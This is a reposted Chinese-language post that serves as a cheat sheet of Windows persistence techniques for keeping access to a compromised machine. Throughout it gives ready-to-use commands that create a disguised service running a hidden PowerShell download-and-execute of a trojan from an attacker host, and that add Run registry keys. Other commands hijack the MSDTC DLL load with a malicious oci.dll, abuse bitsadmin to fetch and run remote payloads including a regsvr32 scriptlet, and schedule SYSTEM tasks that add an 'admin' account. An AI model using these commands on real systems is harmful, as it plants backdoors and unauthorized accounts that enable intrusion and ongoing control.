转自--http://www.ansbase5.org/?p=366
服务启动
使用SC命令创建windows服务名最好伪装下,binpath= 这里一定要注意有个空格,不然创建不成功,把powershell远程执行下载命令也包含进去地址:http://192.168.1.82:19001/a链接就是我们刚刚生成的木马地址
sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX(((new-object net.webclient).downloadstring('http://192.168.1.82:19001/a'))\""
SC config "name" start= auto //我们需要把这个name服务设置为自动。
Sc description "name" "description" // 设置服务的描述字符串
net start "name" // 启动服务
SC delete "name" //删除这个服务,不想使用服务直接删除
PS:不是所有程序都可以作为服务的方式运行,所以请看:http://www.x2009.net/articles/create-a-windows-service-methods.html
regedit 注册表启动
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\Administrator\Desktop\artifact1.exe" /f//当系统注销,再次进入登入到目标系统就会上线,权限是继承的。
MSDTC
http://www.4hou.com/system/6890.html
简单说:在域和工作组中,MSDTC服务启动时,会搜索注册表Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI,MSDTC.exe启动时会加载3个dll(oci.dll,SQLLib80.dll,xa80.dll),有一个dll不是系统自带的,我们可以把我们的dll马子替换成其中的那个不自带的dll的名字(oci.dll)。
net start msdtc // 手动启动 msdtc
降权启动MSDTC.exe :msdtc -install
>PS: 渗透技巧——程序的降权启动 http://t.cn/RSp4h4O
启动项
C:\Users\{user}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Bitsadmin
该项的自启动是利用了schtasks来自启动的,必须要用户登录,且在登录后2-4分钟后才会执行,此法貌似是有个90天的限制的?
需要权限:管理员
说明:下方的start_test是任务名,%comspec%是cmd的绝对路径,%temp%是用户的临时目录。
第一种:配合Powershell,测试成功
bitsadmin /create start_test //添加用户名
bitsadmin /addfile start_test %comspec% %temp%\cmd.exe //添加文件,此步骤是为下一步做铺垫,
bitsadmin /SetNotifyCmdLine start_test "%COMSPEC%" "cmd.exe /c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.1:81/a'))\"" //第二步完成之后就启动这一步
bitsadmin /Resume start_test //启动下载任务
第二种:直接下载EXE执行
bitsadmin /create start_test //创建任务
bitsadmin /addfile start_test http://www.baidu.com/muma.exe %temp%\muma.exe //添加文件,此步骤是为下一步做铺垫,
bitsadmin /SetNotifyCmdLine start_test "%COMSPEC%" "cmd.exe /c bitsadmin.exe /complete \"backdoor\" && start /B %temp%\muma.exe" //第二步完成之后就启动这一步
bitsadmin /Resume start_test //启动下载任务
配合其他命令||我举一,你反三
道理都是一样的,你可以用regsvr32,也可以用其他的下载命令。
bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
bitsadmin /Resume backdoor
更加多的命令请看阅读:windows命令执行漏洞不会玩? 看我!:https://evi1cg.me/archives/remote_exec.html ||
下载文件的15种方法 - 爱小狐狸的小螃蟹:http://www.vuln.cn/6665 ||
13种方式下载文件:https://evi1cg.me/archives/13-ways-to-download-a-file.html
更多关于Bitsadmin姿势请阅读:Use bitsadmin to maintain persistence and bypass Autoruns:https://www.tuicool.com/articles/rqe63qj||
使用计划任务和bitsadmin实现恶意代码长期控守:http://blog.csdn.net/qq_31481187/article/details/57540231
SchTasks
>强大的任务计划功能,你值得拥有的:官方网站文档:https://technet.microsoft.com/zh-cn/library/cc772785.aspx#BKMK_days
Onstart:schtasks /create /tn sch /ru system /sc onstart /tr "net user admin admin /add" /f
Onlogin:schtasks /create /tn sch /ru system /sc onlogin /tr "net user admin admin /add" /f
Onidle:schtasks /create /tn sch /ru system /sc onidle /i 1 /tr "net user admin admin /add" /f
every 1 min:schtasks /create /tn sch /ru system /sc MINUTE /mo 1 /tr "net user admin admin /add" /f
every 1 day:schtasks /create /tn sch /ru system /sc daily /mo 1 /tr "net user admin admin /add" /f
onince:schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc once /sd 01/01/2003 /st 00:00 /f
网友评论